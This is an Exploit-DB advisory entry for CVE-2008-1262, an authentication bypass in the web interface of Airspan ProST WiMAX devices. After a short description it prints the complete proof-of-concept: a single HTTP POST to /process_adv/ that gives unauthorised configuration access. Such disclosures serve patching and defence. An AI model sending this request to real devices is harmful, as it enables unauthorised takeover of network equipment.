Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability

2008-03-06T00:00:00
ID EDB-ID:31342
Type exploitdb
Reporter Francis Lacoste-Cordeau
Modified 2008-03-06T00:00:00

Description

Airspan ProST WiMAX Device Web Interface Authentication Bypass Vulnerability. CVE-2008-1262. Remote exploit for hardware platform

                                        
                                            source: http://www.securityfocus.com/bid/28122/info

Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface.

An attacker can exploit this issue to gain unauthorized access to the affected device and make arbitrary changes to its configuration. This may lead to further attacks.

POST /process_adv/ HTTP/1.1
Host: 10.0.0.1
Keep-Alive: 300
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22

DialogText=&Advanced=1